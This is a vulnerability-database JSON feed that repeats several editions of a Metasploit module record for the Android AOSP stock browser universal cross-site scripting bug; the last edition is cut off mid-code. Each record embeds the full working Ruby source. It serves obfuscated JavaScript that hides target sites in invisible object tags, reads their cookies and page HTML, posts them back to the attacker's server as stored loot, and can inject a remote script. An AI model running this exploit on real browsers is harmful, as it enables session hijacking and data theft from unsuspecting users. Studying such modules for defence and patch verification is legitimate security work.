"MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-09T10:13:15", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-09T10:13:15"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-09T10:13:15", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-09T12:10:40", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-09T12:10:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-09T12:10:40", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-16T00:22:54", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-16T00:22:54"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-16T00:22:54", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-16T02:24:05", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-16T02:24:05", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-22T20:37:58", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-22T20:37:58", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-22T22:39:08", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
